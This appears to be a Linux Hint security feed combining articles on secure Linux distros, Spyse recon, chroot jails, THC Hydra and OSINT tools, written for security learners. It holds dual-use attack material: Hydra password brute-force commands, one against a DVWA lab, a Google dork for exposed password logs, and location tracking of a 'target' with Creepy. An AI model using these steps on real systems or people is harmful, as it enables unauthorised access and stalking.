Security – Linux Hint (https://linuxhint.com)

Top 10 Most Secure Linux Distros for Personal Use
(https://linuxhint.com/most-secure-linux-distros-personal-use/, Fri, 05 Mar 2021)

It is no secret that everyone looks for a secure operating system that offers top-notch privacy. If you are using a system that is not secure enough, anyone can access your system and exploit your data, such as photos, videos, files, and sensitive financial information. Linux systems offer fantastic privacy and security compared to other operating systems, like Windows or macOS, so it is best to go with a Linux system for better security. However, the list of secure Linux distros is extensive, and it can be difficult to choose one.

Several different kinds of secure Linux distros exist, and each is developed for unique usages, including spy-level security, personal use, organizational usage, and more. So, if you want standard security and privacy, you can use the Linux distros that are best for personal use. This article will help you to choose the best Linux distro for your personal usage needs. The following sections include complete information about the top 10 most secure Linux distros available for personal use.

1. Linux Kodachi

Linux Kodachi is a lightweight Linux distro based on Xubuntu 18.04 and developed for running from a USB or DVD. Kodachi is one of the most secure Linux distros available for personal use, offering an anonymous, anti-forensic, and secure system to users. For even tighter security, Linux Kodachi filters all network traffic through a VPN (Virtual Private Network) and the Tor network to obscure your location. This Linux distro also removes all activity traces after you use it. Kodachi is based on the stable Debian branch, with customized Xfce features for higher stability, security, and privacy.

Kodachi also supports DNSCrypt, a protocol and utility that encrypts requests to OpenDNS resolvers using elliptic-curve cryptography. As mentioned previously, Kodachi also ships a browser based on the Tor Browser, in which you can eliminate any questionable Tor modules.

Pros and cons of Linux Kodachi

Pros:
  • Contains various pre-installed programs.
  • Offers a powerful security system.
  • Provides speedy network access.
  • Is highly stable.

Cons:
  • Many users complain about the narrow range of services, as Kodachi is based on Xubuntu.

2. Qubes OS

Qubes OS is one of the most secure Linux distros available. Many users recommend this distro for a high-level privacy system. Qubes is a security-oriented operating system (OS) that still lets you run your everyday programs on a computer/laptop. This Linux distro isolates the user's files from malicious activities and malware without affecting the data. Qubes OS provides top-notch security through compartmentalization: you can run different tasks in securely isolated compartments known as qubes.

The Qubes operating system uses the RPM package manager and can work with any desktop environment without consuming an excessive amount of resources. Most importantly, Qubes is an open-source operating system, so the source code is easily available online. We recommend Qubes OS if you need advanced security, but it is a somewhat advanced operating system for new users.

Pros and Cons of Qubes OS

Pros:
  • Users can perform application separation with sandboxed virtual machines, ensuring that malicious scripts or apps cannot reach system applications.
  • Offers a higher level of separation from the Internet by forcing all Internet traffic through the Whonix Tor gateway.

Cons:
  • Only recommended for advanced users.
  • It is difficult to test Qubes OS because it does not work well in a virtual machine.

3. Whonix

Whonix is based on Debian GNU/Linux and offers outstanding security and advanced privacy. This distro is one of the most secure Linux distros if you want something different for your system's security. Whonix is different because it does not run as a live system; instead, it runs in a virtual machine that is isolated from the primary operating system, which eliminates the risk of DNS leaks.

There are two specific parts to Whonix. The first is Whonix-Gateway, which works as the Tor gateway. The second is Whonix-Workstation, an isolated network that routes all connections through the Tor gateway. This Linux distro will work well if you need a private IP address for your system. As mentioned earlier, Whonix is based on Debian, and it utilizes two different VMs (virtual machines), which makes it a little resource hungry.

Pros and Cons of Whonix

Pros:
  • Uses VirtualBox technology to ensure that many people can use this distro easily.
  • Is easy to set up and use because it does not require special knowledge.

Cons:
  • Is somewhat resource hungry because it requires a high-end system for proper use.
  • Anonymity is offered only in the Workstation virtual machine, and users can easily forget this.

4. Tails (The Amnesic Incognito Live System)

Tails, or The Amnesic Incognito Live System, is a security-centric system based on Debian. It is one of the most secure Linux distros available for personal use because it was designed to protect your identity by keeping your activities anonymous. Tails forces all incoming and outgoing traffic through the Tor network and blocks all traceable connections. Tails was first released in 2009 for personal computers.

Tails does not require any space on your hard disk, as it only needs space in RAM, which is erased once a user shuts down the system. The default desktop environment of Tails is GNOME, and the distro can be run from a pen drive.

Pros and Cons of Tails

Pros:
  • Is an easy-to-use Linux distro.
  • Lets you quickly start browsing anonymously.
  • Is packaged with the Tor Browser.
  • Offers a secure space to save passwords.

Cons:
  • Must be used as a live-boot OS.
  • Users sometimes misplace the flash drive, which can create major issues.
  • The Tor Browser bundled with Tails is somewhat stripped down, which can be problematic.

5. Kali Linux

Kali Linux is based on Debian and was created to offer an amazing penetration-testing Linux distro for ethical hacking, security experts, digital forensics, and network security assessments. This distribution is one of the best and most secure Linux distros for personal use, providing users with tools like Foremost, Wireshark, Maltego, Aircrack-ng, Kismet, and more. These packages offer various benefits to users, such as exploiting a victim application, checking a targeted IP address, and performing network discovery.

You can use Kali Linux via a USB stick or DVD, so this distro is quite easy to use, like the Tails distro mentioned earlier in the list. Kali Linux is compatible with both 32- and 64-bit systems. Apart from that, the basic requirements of Kali Linux are 512 MB of RAM and 10 GB of hard disk space. According to multiple surveys, developers consider Kali Linux to be one of the top-ranked and most secure Linux distros available.

Pros and Cons of Kali Linux

Pros:
  • An open-source distribution that can be accessed easily.
  • Includes multi-language support.
  • Allows users to locate different binaries easily.

Cons:
  • Can make the system a bit slower than usual.
  • Users face software-related issues.
  • Sometimes, Kali Linux corrupts the system.

6. Parrot Security OS

Parrot Security OS was developed by FrozenBox and is based on a Debian distribution. Released in 2013, this Linux distro was created for ethical hacking, working anonymously, and penetration testing. This Linux distro was specifically designed to test authorized simulated attacks on the computer system, which can be beneficial for assessing system vulnerabilities. As mentioned earlier, Parrot Security OS is an open-source and free GNU distribution made for security researchers, developers, penetration testers, privacy enthusiasts, and forensic investigators.

Parrot Security OS comes as a portable laboratory that protects your system from security-related issues while using the Internet, gaming, or browsing. This Linux distro is distributed as a rolling release (frequently providing updates and new applications), ships MATE as its default desktop environment, and includes core applications such as the Parrot Terminal, Tor Browser, and OnionShare.

Pros and Cons of Parrot Security OS

Pros:
  • Offers a large number of tools.
  • The widgets are very easy to use.
  • Does not require a GPU to run correctly.
  • Has a sleek UI, and things are easy to navigate.

Cons:
  • It is not minimalistic.
  • It has shortcut-related issues.

7. BlackArch Linux

BlackArch is based on Arch Linux, and it is a lightweight Linux distro designed for penetration testers, security researchers, and computer experts. This Linux distro provides multiple features, combined with 2,000+ cybersecurity tools that users can install according to their requirements. BlackArch can be used on almost any hardware, as it is a lightweight Linux distro; it is also a relatively new project, and many developers prefer this distro nowadays.

According to the reviews, this Linux distro can compete against many reliable OS due to the variety of features and tools for experts that it offers. Users can choose between different desktop environments, including Awesome, spectrwm, Fluxbox, and Blackbox. BlackArch is available in the DVD image, and you can also easily run it from a pen drive.

Pros and Cons of BlackArch Linux

Pros:
  • Offers a large repository.
  • It is a suitable choice for professionals.
  • It is better than ArchStrike.
  • It is based on Arch Linux.

Cons:
  • It is not recommended for beginners.
  • Sometimes, the system becomes slower while using BlackArch.

8. IprediaOS

IprediaOS is a privacy-centered Linux distro based on Fedora. If you are looking for a platform to browse, email, and share files anonymously, then IprediaOS is a good choice for you. Along with privacy and anonymity, IprediaOS also provides stability, computing ability, and amazing speed. Compared to other Linux distros, IprediaOS is much faster, and you can run this distro smoothly even on older systems.

The Ipredia operating system is security-conscious, and it is designed with the minimalist ideology of shipping with vital applications. IprediaOS seeks to transparently encrypt and anonymize all traffic by sending it through an I2P anonymizing network. The basic features of IprediaOS include I2P Router, Anonymous BitTorrent client, Anonymous email client, Anonymous IRC client, and more.

Pros and Cons of IprediaOS

Pros:
  • Can be used on an older system.
  • Provides anonymous email client services.

Cons:
  • Sometimes, users face performance-related issues.

9. Discreete

Discreete Linux is based on Debian, and it was developed to offer protection from trojan-based surveillance by isolating your working environment and its secured data from the rest of the system. Discreete was formerly known as UPR (Ubuntu Privacy Remix), and it is a trusted, secure Linux distro that will protect your data. You can use this OS via CD, DVD, or USB drive, as it cannot be installed on the hard drive, and all networking is deliberately disabled while Discreete is running.

Discreete is one of the more unique Linux distros in terms of security, and it was developed for everyday computer activities, such as gaming or word processing. As mentioned above, Discreete disables the Internet connection while you work so that your data and cryptographic keys remain protected from non-trusted networks.

Pros and Cons of Discreete

Pros:
  • It is best for everyday work.
  • You can use it via DVD, CD, or USB drive.

Cons:
  • Disables the network when a user works on it.

10. TENS

TENS stands for Trusted End Node Security. TENS was developed by the United States Department of Defense's Air Force Research Laboratory. This Linux distro runs without installation and does not need administrator privileges or hard drive storage. TENS uses an Xfce desktop customized to look like a Windows XP desktop; everything about its appearance, including application names and placements, is similar to Windows.

This Linux distro is available in two editions. The first edition of TENS is a Deluxe edition that includes various applications, like LibreOffice, Evince PDF reader, Totem Movie Player, Thunderbird, and so on. The other edition of TENS is the regular edition that includes an encryption app and some other useful apps.

Pros and Cons of TENS

Pros:
  • Offers great security and privacy.
  • Provides two different editions for users.

Cons:
  • The dated, Windows XP-like look may not appeal to everyone.
  • Exhibits performance-related issues.

Conclusion

This article provided a list of the top ten most secure Linux distros for personal use. All the distros discussed in this article offer amazing features and anonymity to the user. We have included these Linux distros according to user reviews and features, but the list position of each distribution is completely random. Privacy, security, and anonymity are important for performing specific computer-related tasks, and any of these Linux distros would be a great choice for keeping your information safe from malicious threats.

How to recon Domains and IPs with Spyse toolset
(https://linuxhint.com/recon-domains-ips-spyse-toolset/, Mon, 01 Feb 2021)

Reconnaissance, shortly termed recon, refers to the set of related activities and techniques used to gather information about a target system. Various techniques are used to perform reconnaissance, such as footprinting and scanning. Reconnaissance falls under the category of ethical hacking and can be performed by a specialist. There are many cybersecurity software tools out there that help us perform reconnaissance, but few are nearly as good as Spyse.

Spyse takes a very out-of-the-box approach to online security, and for this reason it has found a following among cybersecurity enthusiasts. It works like a search engine, collecting large swathes of data off the web, which makes it a compelling tool. Spyse maintains its own database, which it claims is the biggest cybersecurity database on the Internet, so you can get your hands on some seriously heavy-duty reconnaissance data.

This post describes how to recon domains and IPs with the Spyse toolset.

Getting started with Spyse

Spyse has a web-browser interface and no installable package. To access the Spyse toolset, open a new tab in your browser, go to spyse.com, and click the signup button.


Now enter your details. You have two options: you can make an individual account, or you can link your company account. I have made an individual account.


A verification/confirmation mail will be sent to your account. Go to your mail account and click the link provided. You will be given a guest account with limited functionality. You can purchase the tool via subscription-based packages: Standard, Professional, and Business packages are available.

Spyse suite tools:

There are many tools associated with Spyse. All of these tools have a specific advantage in reconnaissance of the internet. The tools are mentioned below:

  • API
  • Advanced Search
  • Bulk Search
  • Subdomain Finder
  • Port Scanner
  • ASN Lookup
  • Domain Lookup
  • IP Lookup
  • Reverse IP Lookup
  • DNS Lookup
  • NS Lookup
  • MX Lookup
  • Reverse DNS Lookup
  • SSL Lookup
  • WHOIS Lookup
  • Company Lookup
  • Reverse Adsense Lookup
  • CVE Search
  • Technology Checker


Now I will show you how to use some of these tools. I have used three domain names and one server IP for testing.

Recon Domain with Spyse

To recon a domain with Spyse, on the dashboard screen, select the ‘Domain’ option from the given list and enter the domain in the search box.


Next, click 'Search', and Spyse will display all the related domain information. First, a general information section is displayed. Additionally, Spyse displays DNS records, DNS history, technology information, etc.

Recon IP with Spyse

Similarly, to recon an IP with Spyse, select the 'IP' option from the list on the dashboard screen and enter the IP address in the search box.


Click on the search button, and Spyse will display all the related information.

Advanced Search with Spyse

With Spyse Advanced Search, you can collect live data while browsing through sections of the database. Five search parameters can be added to each keyword that you enter in the advanced search option to yield results otherwise unavailable. Say you were looking for hosts using a particular port: with advanced search, you can retrieve complementary information such as open ports, CVEs, running programs, the operating system in use, and other information related to the company.

For instance, suppose I want to find domains that contain 'linux' in the title. For that purpose, click on 'Domain' and add a filter for the title.


Now, click on search and Spyse will retrieve all the results from its database.

Wrapping up

Reconnaissance is performed to gather data about a website. When it comes to cybersecurity, Spyse has knocked it right out of the park. This post explained how to use the Spyse interface with examples, including domain search, IP search, and advanced search.

How To Setup Linux Chroot Jails
(https://linuxhint.com/setup-linux-chroot-jails/, Sun, 27 Dec 2020)

Linux systems, especially those dedicated to critical services, require expert-level knowledge and core security measures.

Unfortunately, even after taking crucial security measures, security vulnerabilities still find their way into secure systems. One way to manage and protect your system is by limiting the damage possible once an attack occurs.

In this tutorial, we’ll discuss the process of using chroot jail to manage system damages in the event of an attack. We’ll look at how to isolate processes and subprocesses to a particular environment with false root privileges. Doing this will limit the process to a specific directory and deny access to other system areas.

A Brief Introduction To chroot jail

A chroot jail is a method of isolating processes and their subprocesses from the main system using false root privileges.

As mentioned, isolating a particular process using fake root privileges limits damages in the case of a malicious attack. Chrooted services are limited to the directories and files within their directories and are non-persistent upon service restart.

Why use chroot jail

The main purpose of a chroot jail is to serve as a security measure. Chroot is also useful for recovering lost passwords by mounting devices from live media.

There are various advantages and disadvantages to setting up a chroot jail. These include:

Advantages

  • Limits access: In the case of a security compromise, the only damaged directories are those within the chroot jail.
  • Command limits: Users or processes are limited to the commands allowed in the jail.

Disadvantages

  • It can be challenging to set up.
  • It requires a lot of work: if you need a command beyond those allowed by default, you must include it manually.

How to Create a Basic Chroot Jail

In this process, we will create a basic chroot jail with three commands limited to that folder. This will help illustrate how to create a jail and assign various commands to it.

Start by creating a main folder. You can think of this folder as the / directory of the main system. The name of the folder can be anything; in our case, we call it /chrootjail:

sudo mkdir /chrootjail

We will use this directory as the fake root containing the commands we will assign to it. For the commands we'll use, we require the bin directory (which contains the command executables) and the etc directory (which contains configuration files for the commands).

Inside the /chrootjail folder, create these two folders:

sudo mkdir /chrootjail/{etc,bin}

The next step is to create directories for dynamically linked libraries for the commands we want to include in the jail. For this example, we will use bash, ls, and grep commands.

Use the ldd command to list the dependencies of these commands, as shown below:

sudo ldd /bin/bash /bin/ls /bin/grep

If you are not inside the bin folder, you need to pass the full path for the commands you wish to use. For example, ldd /bin/bash or ldd /bin/grep

From the ldd output above, we need the lib64 and /lib/x86_64-linux-gnu directories. Inside the jail directory, create these folders.

sudo mkdir -p /chrootjail/{lib/x86_64-linux-gnu,lib64}

Once we have created the dynamic library directories, we can list them with the tree command, as shown below:
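If tree is not installed, find can stand in for it. A minimal sketch of recreating and listing the jail skeleton (run as root, or prefix the commands with sudo):

```shell
# Create the jail skeleton and list its directories.
# find(1) stands in for tree, which may not be installed by default.
mkdir -p /chrootjail/bin /chrootjail/etc
mkdir -p /chrootjail/lib/x86_64-linux-gnu /chrootjail/lib64
find /chrootjail -type d | sort
```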

As we progress, you will start to get a clear image of what a chroot jail means.

We are creating an environment similar to a normal root directory of a Linux system. The difference is, inside this environment, only specific commands are allowed, and access is limited.

Now that we've created the bin, etc, lib, and lib64 directories, we can add the required files inside their respective directories.

Let us start with the binaries.

sudo cp /bin/bash /chrootjail/bin && sudo cp /bin/ls /chrootjail/bin && sudo cp /bin/grep /chrootjail/bin

Having copied the binaries for the commands we need, we require the libraries for each command. You can use the ldd command to view the files to copy.

Let us start with bash. For bash, we require the following libraries:

/lib/x86_64-linux-gnu/libtinfo.so.6
/lib/x86_64-linux-gnu/libdl.so.2
/lib/x86_64-linux-gnu/libc.so.6
/lib64/ld-linux-x86-64.so.2

Instead of copying all these files one by one, we can use a simple for loop to copy each library into /chrootjail/lib/x86_64-linux-gnu.
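The simple for loop mentioned above can be sketched as follows. Rather than hard-coding paths, this sketch pulls the library paths straight out of ldd's output, and uses cp --parents (a GNU coreutils option) to recreate each library's directory path under the jail. Run it as root, or prefix cp with sudo:

```shell
# Copy every shared library bash needs into the jail, preserving paths.
mkdir -p /chrootjail
for lib in $(ldd /bin/bash | grep -o '/[^ ]*\.so[^ ]*'); do
  cp --parents "$lib" /chrootjail
done
```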

Let us repeat this process for the ls and grep commands, copying each library that ldd lists for them.
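The same copy loop, repeated for ls and grep, can be sketched as a single nested loop (again assuming GNU cp for --parents; prefix cp with sudo if you are not root):

```shell
# Copy the shared libraries for ls and grep into the jail.
mkdir -p /chrootjail
for bin in /bin/ls /bin/grep; do
  # ldd prints resolved library paths; extract anything that looks like a path.
  for lib in $(ldd "$bin" | grep -o '/[^ ]*\.so[^ ]*'); do
    cp --parents "$lib" /chrootjail
  done
done
```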

Next, inside the lib64 directory, we need the dynamic loader, which is shared across all the binaries. We can simply copy it using a cp command:
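On x86-64 Debian/Ubuntu systems, the loader shown in the ldd output above can be copied like this (the exact file name differs on other architectures; prefix cp with sudo if you are not root):

```shell
# Copy the dynamic loader, shared by all three binaries, into the jail.
mkdir -p /chrootjail/lib64
cp /lib64/ld-linux-x86-64.so.2 /chrootjail/lib64/
```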

Next, let us edit the main bash login file (located at /etc/bash.bashrc on Debian) to tweak the bash prompt to our liking, using echo and tee as shown:

echo 'PS1="CHROOTJAIL #"' | sudo tee /chrootjail/etc/bash.bashrc

Once we have completed all the steps above, we can log in to the jail environment using the chroot command as shown.

sudo chroot /chrootjail /bin/bash

You will be dropped into the jail with root privileges and the prompt configured by the echo and tee commands above.

Once you log in, you will see that you only have access to the commands you included when you created the jail. If you require more commands, you have to add them manually.

NOTE: Since you have included the bash shell, you will have access to all the bash built-in commands. That allows you to exit the jail using the exit command.

Conclusion

This tutorial covered what a chroot jail is and how to use it to create an environment isolated from the main system. You can use the techniques discussed in this guide to create isolated environments for critical services.

To practice what you’ve learned, try to create an apache2 jail.

HINT: Start by creating a root directory, add the config files (etc/apache2), add the document root (/var/www/html), add the binary (/usr/sbin/apache2), and finally add the required libraries (ldd /usr/sbin/apache2).

How to install and use THC Hydra?
(https://linuxhint.com/how-to-install-and-use-thc-hydra/, Sun, 13 Dec 2020)

Passwords are the weakest links. If someone gets ahold of your password, it's game over! As such, passwords are the most important security weakness. There are many tools that allow you to attempt username:password combinations, but none of them are as potent as THC Hydra. It is both fast and supports a large number of protocols to brute force; in fact, it can deal with about 55 different protocols. Moreover, there are two versions of THC Hydra: a GUI version and a CLI version.

Installing THC Hydra

Download THC hydra from https://github.com/vanhauser-thc/thc-hydra.

Once downloaded, extract the files, and execute the following:

cd thc-hydra-master/
./configure
make
sudo make install

If you're using Ubuntu/Debian, install these development packages as well:

sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
                libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
                firebird-dev libmemcached-dev libgpg-error-dev \
                libgcrypt11-dev libgcrypt20-dev

CLI Usage

Here, we examine how to use hydra with common protocols.

SSH/FTP/RDP/TELNET/MYSQL

One must remember that Hydra can deal with approximately 55 different protocols. These are but a few examples of the most dealt-with protocols, such as ssh, ftp, rdp, telnet, and mysql. However, the same principle applies to the remaining protocols.

In order to get Hydra to work with a protocol, you’ll need either a username (-l) or a list of usernames (-L), a list of passwords (a password file), and the target IP address associated with the protocol. You can add further parameters if you wish. For example, -V for verbosity.

hydra -l <username> -P <password file> <protocol>://<ip>

Alternatively, you can also format it as follows:

hydra -l <username> -P <password file> -s <port> -V <ip> <protocol>

-l or -L: username or list of usernames to attempt
-P: password list
-s: port
-V: verbose
<protocol>: ftp/rdp/ssh/telnet/mysql/etc…
<ip>: ip address

For example, for FTP:

hydra -V -f -l <username> -P <password file> ftp://<ip>

Or

hydra -l <username> -P <password file> -s 21 -V <ip> ftp

HTTP-GET-FORM

Depending on the type of request, GET or POST, you can use either http-get-form or http-post-form. Under the inspect element, you can figure out whether the page is a GET or POST. You can then use the http-get-form when attempting to find the password to a username:password combination on the web (for instance, a website).

hydra -l <username> -P <password file> -V -f <ip> http-get-form "a:b:c:d"

-l or -L: username or list of usernames to attempt
-P: password list
-f : stop when the password is found
-V: verbose
a: the login page path
b: the form parameters, with the username/password combination replaced by ^USER^ and ^PASS^
c: the error message received if login fails
d: H=session cookie

For example, suppose we wish to hack DVWA (Damn Vulnerable Web Application). Once online using apache2, it should be at your local IP. In my case, it’s at http://10.0.2.15.

So, the:
<ip>: 10.0.2.15
a: /vulnerabilities/brute/

Next, we need b and c. So, let’s try to login with fake credentials (anything here will do). The site displays this message: “Username or password incorrect.” Therefore, we will use the message c:

c: username or password incorrect

So, b will be as follows:

b: username=^USER^&password=^PASS^&Login=Login#

Replace the credentials inputted with ^USER^ and ^PASS^. If this was a POST request, you would find this information under the inspect element > Request tab.

Next, under inspect element, copy the cookie. This will be d:

d: H=Cookie:PHPSESSID=3046g4jmq4i504ai0gnvsv0ri2;security=low

So, for example:

hydra -l admin -P /home/kalyani/rockyou.txt -V -f 10.0.2.15 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:username or password incorrect:H=Cookie:PHPSESSID=3046g4jmq4i504ai0gnvsv0ri2;security=low"

When you run this, and if the password is in the list, then it will find it for you.

However, if this proves to be too much work for you, no need to stress out because there’s a GUI version as well. It is a lot simpler than the CLI version. The GUI version of THC hydra is called Hydra GTK.

Installing Hydra GTK

In Ubuntu, you can simply install Hydra GTK using the following command:

sudo apt-get install hydra-gtk -y

Once installed, you will need the following:

  1. A target or list of targets: This is the IP address of the protocol you wish to attack
  2. Port number: the port number associated with the protocol
  3. Protocol: ssh, ftp, mysql, etc…
  4. Username: either input a username or a list of usernames
  5. Password or Password list

Depending on whether you want to hack one or multiple targets, you can either input one or many targets into the target box. Suppose you’re attacking a single target, an SSH, located at 999.999.999.999 (a fake IP address, obviously). In the target box, you’d put 999.999.999.999, and in the port section, you’d put 22. Under the protocol, you’d put SSH. It would be advisable to tick the “be verbose” and the “show attempts” boxes as well. The “be verbose” box is equivalent to -v in THC Hydra, while the “show attempts” box is equivalent to -V in THC Hydra. The plus point about Hydra is that it can deal with a large number of protocols.

In the next tab, input the username you desire or a list of usernames (the location of the list of usernames in this case). For instance, in the “username list”, I would put “/home/kalyani/usernamelist.txt”. The same is true for passwords. The location of the password file is inputted in the box called “password list”. Once these have been filled in, the rest is easy. You can leave the tuning and specific tabs as is and click on the start button under the start tab.

Hydra GTK is a lot easier to use than THC Hydra, even though they are the same thing underneath. Whether you use THC Hydra or Hydra GTK, both are great tools to crack passwords. The problem typically encountered comes in the form of the password list used. You can use other programs, such as crunch and other wordlist generators, to tailor your password list to your liking. If you do tailor the password list to your use case, Hydra can become a very powerful ally.

Happy Hacking!

OSINT Tools and Techniques
(https://linuxhint.com/osint-tools-and-techniques/, Tue, 24 Nov 2020)

OSINT, or Open Source Intelligence, is the act of gathering data from distributed and freely accessible sources, such as the Internet or other publicly available media. OSINT tools are used to gather and correlate data from the web. Data is accessible in different structures, including text, documents, images, etc. This is a technique used by intelligence and security companies to gather information. This article provides a look at some of the most useful OSINT tools and techniques.

Maltego

Maltego was created by Paterva and is utilized by law enforcement, security experts, and social engineers for gathering and dissecting open-source information. It can gather large amounts of information from various sources and utilize different techniques to produce graphical, easy-to-read outcomes. Maltego provides a transform library for the exploration of open-source data and represents that data in a graphical format suitable for relation analysis and data mining. These transforms are built in and can likewise be altered as needed.

Maltego is written in Java and works with every operating system. It comes pre-installed in Kali Linux. Maltego is widely used because of its pleasant and easy-to-understand entity-relationship model that represents all the relevant details. The key purpose of this application is to investigate real-world relationships between people, web pages or domains of organizations, networks, and internet infrastructure. The application may also focus on the connection between social media accounts, open-source intelligence APIs, self-hosted Private Data, and Computer Networks Nodes. With integrations from different data partners, Maltego expands its data reach to an incredible extent.

Recon-ng

Recon-ng is a reconnaissance tool similar in design to Metasploit. When recon-ng is run from the command line, you enter a shell-like environment in which you can configure options, run modules, and generate reports in different formats. The virtual console of Recon-ng offers a variety of helpful features, such as command completion and contextual help. If you want to hack something, use Metasploit. If you want to gather public information, use the Social Engineering Toolkit and Recon-ng to carry out reconnaissance.

Recon-ng is written in Python, and its independent modules, API key management, and other features are used mainly for data collection. The tool is preloaded with several modules that use online search engines, plugins, and APIs to assist in collecting information about the target. Recon-ng automates time-consuming OSINT processes, such as the cutting and pasting you would otherwise do by hand. Recon-ng does not claim to carry out all OSINT collection, but it can be used to automate many of the more common forms of harvesting, allowing more time for the work that still needs to be done manually.

Use the following command to install recon-ng:

ubuntu@ubuntu:~$    sudo apt install recon-ng
ubuntu@ubuntu:~$    recon-ng

To list the available commands, use the help command:

Suppose we need to gather the subdomains of a target. We will use a module named "hackertarget" to do so.

[recon-ng][default] > load hackertarget
[recon-ng][default][hackertarget] > show options
[recon-ng][default][hackertarget] > set source google.com

Now, the program will gather related information and show all the subdomains of the target set.

Shodan

To find anything on the Internet, especially the Internet of Things (IoT), the optimum search engine is Shodan. While Google and other search engines index only the web, Shodan indexes almost everything else connected to the Internet: webcams, water supply systems, private jets, medical equipment, traffic lights, power plants, license plate readers, smart TVs, air conditioners, and anything else you can think of that is wired into the internet. The greatest benefit of Shodan lies in helping defenders locate vulnerable machines on their own networks. Let us look at some examples:

  • To find Apache servers in Hawaii:
    apache city:"Hawaii"
  • To find Cisco devices on a given subnet:
    cisco net:"214.223.147.0/24"

You can find things like webcams, default passwords, routers, traffic lights, and more with simple searches, as Shodan's query syntax is simple and clear.

Google Dorks

Google hacking, or Google dorking, is a hacking tactic that utilizes Google Search and other Google apps to identify security flaws in a website’s configuration and machine code. “Google hacking” involves using specialized Google search engine operators to find unique text strings inside search results.
Let us explore some examples using Google dorks to locate private information on the Internet. There is a way of identifying .LOG files that are unintentionally exposed on the internet. A .LOG file contains clues about what system passwords could be, or about the different system user or admin accounts that may exist. Upon typing the following query into the Google search box, you will find a list of pages with .LOG files exposed before the year 2017:

allintext:password filetype:log before:2017

The following search query will find all the web pages that contain the specified text:

intitle:admbook intitle:Fversion filetype:php

Some other very powerful search operators include the following:

  • inurl: Searches for specified terms in the URL.
  • filetype: Searches for specific file types.
  • site: Limits the search to a single site.
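These operators can be combined in a single query. As a purely hypothetical illustration (the site name is a placeholder), the following dork would restrict the password-in-log-file search shown earlier to one site:

```text
site:example.com filetype:log intext:password
```

Here, intext: matches the given word in the page body, analogous to the allintext: operator used above.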

Spyse

Spyse is a cybersecurity search engine that can be used to quickly find internet assets and conduct external identification. The advantage of Spyse is partly due to its database methodology, which avoids the issue of long scanning times on queries for data collection. With several services operating at the same time, and with reports that can take a very long time to return, cybersecurity specialists know how inefficient scanning can be. This is the main reason why cybersecurity professionals are shifting towards this search engine. The Spyse archive holds over seven billion important data documents that can be downloaded instantly. Using 50 highly functional servers with data split into 250 shards, consumers can profit from the biggest scalable online database available.

In addition to supplying raw data, this cyberspace search engine also focuses on demonstrating the relationship between various areas of the Internet.

The Harvester

The Harvester is a Python-based utility. Using this program, you can obtain information — email addresses, subdomains, virtual hosts, employee names, open ports, and banners — from numerous public sources, such as search engines, PGP key servers, and the Shodan device database. If you want to determine what an intruder can see of the company, this instrument is useful. The Harvester comes pre-installed in Kali Linux, where you only have to update it before use. On other distributions, issue the following command to install it:

ubuntu@ubuntu:~$ sudo apt-get install theharvester

The basic syntax of The Harvester is as follows:

ubuntu@ubuntu:~$ theharvester -d [domainName] -b [searchEngineName / all][parameters]

Here, -d is the company name or the domain you want to search, and -b is the data source, such as LinkedIn, Twitter, etc. To search emails, use the following command:

ubuntu@ubuntu:~$ theharvester -d microsoft.com -b all

The ability to search for virtual hosts is another fascinating feature of The Harvester. Through DNS resolution, the application validates whether several hostnames are connected with a certain IP address. This knowledge is very important because the reliability of that IP for a single host relies not just on its own level of security, but also on how safely the other hosts on the same IP are configured. In fact, if an attacker breaches one of them and gets access to the network server, then the attacker can easily reach every other host.

SpiderFoot

SpiderFoot is a platform used for capturing IPs, domains, email addresses, and other analysis objectives from multiple data outlets, including platforms such as "Shodan" and "Have I Been Pwned," for Open Source Intelligence and vulnerability detection. SpiderFoot can be used to simplify the OSINT compilation process of finding information about the target by automating the gathering process.

To automate this process, SpiderFoot searches over 100 sources of publicly available information and manages all classified intel from the various sites, email addresses, IP addresses, networking devices, and other sources. Simply specify the goal, pick the modules to run, and SpiderFoot will do the rest for you. For example, SpiderFoot can gather all the data necessary to create a complete profile on a subject you are studying. It is multiplatform, has a clean web interface, and supports more than 100 modules. To install SpiderFoot, first install the Python modules specified below:

ubuntu@ubuntu:~$    sudo apt install python3-pip
ubuntu@ubuntu:~$    pip3 install lxml netaddr M2Crypto cherrypy mako requests bs4

Creepy

Creepy is an open-source intelligence platform for geolocation. Using various social networking sites and image hosting services, Creepy gathers location-tracking information. Creepy then displays the reports on a map, with a search methodology based on precise location and time. You can later view the files in depth by exporting them in CSV or KML format. Creepy's source code is available on GitHub and is written in Python. You can install this awesome tool by visiting the official website:
http://www.geocreepy.com/

There are two main functionalities of Creepy, specified by two specific tabs in the interface: the “mapview” tab and the “targets” tab. This tool is very useful for security personnel. You can easily predict the behavior, routine, hobbies, and interests of your target using Creepy. A small piece of information that you know may not be of much importance, but when you see the complete picture, you can predict the next move of the target.

Jigsaw

Jigsaw is used to obtain knowledge about the employees of a company. This platform performs well with large organizations, such as Google, Yahoo, LinkedIn, MSN, Microsoft, etc., where we can easily pick one of their domain names (say, microsoft.com) and then compile the emails of their staff across the various divisions of the company. The only downside is that these requests are launched against the Jigsaw database hosted at jigsaw.com, so we depend solely on the knowledge inside their database that they allow us to explore. You can obtain information about major corporations, but you might be out of luck if you are investigating a less-famous startup company.

Nmap

Nmap, which stands for Network Mapper, is unarguably one of the most prominent and popular network scanning tools. Nmap builds on previous network monitoring tools to provide quick, comprehensive scans of network traffic.

To install nmap, use the following command:

ubuntu@ubuntu:~$ sudo apt install nmap

Nmap is available for all major operating systems and comes pre-equipped with Kali. Nmap operates by detecting the hosts and IPs running on a network using IP packets, and then examining these packets to gather details on the hosts and IPs, as well as the operating systems they are running.

Nmap is used to scan small business networks, enterprise-scale networks, IoT devices and traffic, and connected devices. This would be the first program an attacker would use to attack your website or web application. Nmap is a free and open-source tool used on local and remote hosts for vulnerability analysis and network discovery.

The main features of Nmap include port detection (to make sure you know the potential utilities running on a specific port), operating system detection, IP info detection (including MAC addresses and device types), disabling DNS resolution, and host detection. Nmap identifies active hosts through a ping scan, i.e., by using the command nmap -sn 192.100.1.1/24, which returns a list of active hosts and assigned IP addresses. The scope and abilities of Nmap are extremely large and varied. The following are some of the commands that can be used for a basic port scan:

For a basic scan, use the following command:

ubuntu@ubuntu:~$    nmap <target-ip>

For banner grabbing and service version detection scans, use the following command:

ubuntu@ubuntu:~$    nmap -sV -sC <target-ip>

For Operating System detection and aggressive scans, use the following command:

ubuntu@ubuntu:~$    nmap -A -O <target-ip>
